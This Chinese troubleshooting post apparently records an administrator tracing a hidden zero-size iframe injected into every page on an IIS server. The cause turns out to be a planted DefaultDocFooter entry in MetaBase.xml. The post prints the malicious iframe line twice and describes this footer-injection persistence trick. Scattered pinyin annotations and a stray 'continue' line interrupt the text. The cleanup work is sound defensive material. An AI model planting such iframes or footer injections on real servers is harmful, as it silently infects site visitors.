一台服務器 幾乎所有網（wǎng）站打開網頁 甚（shèn）至HTML網頁 都出現了（le）

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

這（zhè）種樣（yàng）式的（de）代碼 有的（de）在頭部　有的在尾部 部分殺毒軟（ruǎn）件打（dǎ）開會報毒

打開HTML或ASP PHP頁麵 在源碼中怎麽也找不到這段代碼

分析原因

首先懷疑ARP掛馬，用防ARP的（de）工具又沒有發（fā）現（xiàn）有arp欺騙

而且arp欺（qī）騙一般不會每次都（dōu）被插入代碼，而是時有時無

而（ér）且使用http://127.0.0.1 或者http://localhost 訪問的時候（hòu）也可（kě）以找到這段代碼

arp欺騙的可能（néng）排除。

然後就想到可能是JS被篡改，或者是其它的包含文（wén）件，查找後沒有發（fā）現被改的頁麵 連（lián）新建的HTML頁麵瀏覽的時候也會被插入這段代碼，那就隻能（néng）是通過ＩＩＳ掛上去的了。

備份iis數據（jù）然後重裝iis，代碼消失（shī），將備份的iis恢複（fù），問題又來了。

仔細尋找，問題應該出在IIS的配（pèi）置文件上，打（dǎ）開配置文件，沒（méi）有發現那段代碼。

那很有可能是調用了某（mǒu）個文件，這個怎麽查啊，忽然想起了大名鼎鼎的Filemon

本地載了一個上傳到服務器上（shàng），打開Filemon，數據太多了（le），過濾掉（diào）一些沒有用（yòng）的

隻留（liú）下iis的進程，數據還是很多，看來服務器上的站點還是挺多人在訪問的。

關掉（diào）所有站點,建了一個測試站點anky 目（mù）錄為D:\www\　在下麵建了一個空白頁麵test.htm

訪問一下這個頁麵代碼被（bèi）插進來了，再看一下Filemon　奇怪怎（zěn）麽讀取C:\Inetpub\wwwroot\iisstart.htm

打開C:\Inetpub\wwwroot\iisstart.htm一看，裏麵（miàn）就躺著

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

把代碼刪除了留空，訪問test.htm 正常了（le），把C:\Inetpub\wwwroot\iisstart.htm刪除了再訪問

test.htm　出現　“讀取數據（jù）頁腳文件出錯”問題就出這裏了，看來是調用了

這個文件。

把C:\Inetpub\wwwroot\iisstart.htm清空就正常了（le），這（zhè）樣怎麽行，解決問題當（dāng）然要連根拔掉。

continue

有沒有可能是（shì）擴（kuò）展造成的，到擴（kuò）展中檢查了一遍全部都是正常的

當然 通過ISAPI 掛馬的也是存在的

左想右想最後還是覺得配置文件有問題

打開配（pèi）置（zhì）文件，配置文件在%windir%\system32\inetsrv\MetaBase.xml

用記事本打開（kāi），查找（zhǎo）iisstart.htm　找到（dào）一行，開始以為是默認站點，後來一想不對啊

默認站點都刪除了，再仔細一看（kàn）這句代碼為

DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm"

刪除掉這一行，問題徹底解決了。